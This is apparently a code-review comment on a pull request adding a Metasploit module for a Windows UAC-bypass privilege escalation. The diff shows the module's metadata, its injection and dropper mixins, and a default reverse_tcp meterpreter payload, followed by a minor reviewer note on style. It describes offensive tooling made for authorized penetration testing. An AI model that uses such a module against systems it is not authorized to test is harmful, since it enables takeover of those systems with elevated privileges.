modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,228 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE # Needed for generate_payload_dll
+  include Msf::Post::Windows::FileSystem
+  include Msf::Post::Windows::ReflectiveDLLInjection
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Windows::Powershell
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TokenMagic UAC Bypass',
+        'Description' => %q{
+          This module leverages a UAC bypass in order to spawn process with system level privileges or abuse a DLL
+          hijacking vulnerability in order to gain SYSTEM level privileges. Windows 7 through to Windows 10 1803
+          are affected.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'James Forshaw', # Research
+            'Ruben Boonen (@FuzzySec)', # PoC
+            'bwatters-r7', # msf module
+            'jheysel-r7' # msf module
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' =>
+          [
+            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2017-05-25',
+        'References' =>
+          [
+            ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'],
+            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'],
+            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'],
+            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html']
+          ],
+        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+            'WfsDelay' => 900
+          }
+      )
+    )
+
+    register_options([
+      OptString.new('SERVICE_NAME',
+                    [false, 'Service Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]),
```

Comment:
```suggestion
                    [false, 'Service Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9)]),
```

Already a string, I think. See other uses, too.